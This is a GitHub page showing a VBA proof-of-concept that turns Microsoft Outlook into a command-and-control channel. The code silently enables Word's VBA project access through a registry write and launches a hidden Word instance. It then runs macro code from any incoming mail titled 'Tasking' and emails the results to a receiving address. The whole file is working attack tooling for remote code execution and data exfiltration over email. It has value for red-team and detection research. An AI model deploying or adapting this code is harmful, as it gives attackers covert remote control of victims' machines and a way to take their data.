-
-
Notifications
You must be signed in to change notification settings - Fork 24
/
Copy pathOutlookC2_POC.vba
82 lines (57 loc) · 2.4 KB
/
OutlookC2_POC.vba
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
'Author: Jake Krasnov
'Twitter: _Hubbl3
'This is a basic POC demonstrating how VBA macros can turn Outlook into a C2
'At startup a word document is opened that is used as the execution applicaiton for VBA routines sent as emails
'The code looks for an Email with the title of Tasking and then executes it
'The Tasking must define a StartTask and GetResults routine
Sub Application_Startup()
'This routine generates the object that allows for interfacing with the inboxes
'it automatically executed at startup. To use these event executions we have to
'be in ThisOutlook Session
Set outlookApp = Outlook.Application
Set objectNS = outlookApp.GetNamespace("MAPI")
'Enable VBA Project Access
Ver = Application.Version
Set ScriptShell = CreateObject("WScript.Shell")
ScriptShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\" & Ver & "\Word\Security\AccessVBOM", 1, "REG_DWORD"
'launch the word doc that will be the process responsible for executing our code
'launches an instance of Microsoft word
Set WordApp = CreateObject("Word.Application")
Set ObjDoc = WordApp.Documents.Add
'Sets the application visible for debugging
'WordApp.Visible = True
End Sub
Sub Application_NewMail()
'When a new email comes in execute
'update the inbox items in our objects
Set inboxItems = objectNS.GetDefaultFolder(olFolderInbox).Items
Set Item = inboxItems(inboxItems.Count)
If StrComp(Item.Subject, "Tasking", vbTextCompare) Then
ExecuteTask Item.Body, WordApp
End If
End Sub
Sub ExecuteTask(str As String, App As Object)
'Adds a macro to the document
Set xPro = App.ActiveDocument.VBProject
Set module = xPro.VBComponents.Add(vbext_ct_StdModule)
module.CodeModule.AddFromString (str)
'Execute the module
App.Run ("Module1.StartTask")
'retrieve the results
SendResults App
End Sub
Sub SendResults(App As Object)
Dim res As String
Set Msg = Application.CreateItem(olMailItem)
res = App.Run("Module1.GetResults")
Set xPro = App.ActiveDocument.VBProject
'build email to return results from the Word tasking
With Msg
.To = "<receiving address>"
.Subject = "Tasking Results"
.Body = res
.Send
End With
'Remove the Module
xPro.VBComponents.Remove xPro.VBComponents("Module1")
End Sub